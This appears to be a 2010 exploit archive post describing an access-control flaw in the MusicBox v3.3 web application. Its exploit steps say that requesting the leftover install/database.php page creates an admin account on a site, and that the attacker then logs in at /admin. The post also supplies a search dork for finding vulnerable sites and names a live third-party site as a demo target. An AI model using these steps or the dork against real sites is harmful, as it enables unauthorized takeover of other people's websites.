id: 11987
date: 07/01/2010
title: MusicBox <= v3.3 (install.php) Change Password Vulnerability
author: Mr.ThieF
cves: 

============================================================
MusicBox <= v3.3 (install.php) Change Password Vulnerability
============================================================


[~] Author : Mr.ThieF

[~] Software Link : www.musicboxv2.com

[~] Version : v3.3

[~] Contact : Sj-@hotmail.com <~

[~] DorK : genre_artists.php?id=13

[~] CVE :

[~] Code :

[~] How To Exploit :

First Get in :
http://localhost/[Path]/install/database.php

The Admin will Be Added Automatically

Thin Login : http://localhost/[Path]/admin


Live Demo  :

http://www.music43.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreeTz : RENO <3 - Saudi ViruS TeaM <3 - Mr.NrFzH <3 - SaFa7 KsA <3 - T3rr0risT <3 DnDoooN_511 <3 Abo MsH3L <3 GoV.HackeR <3 - ALL My FrindS <3



#  0day.today [2023-03-27]  #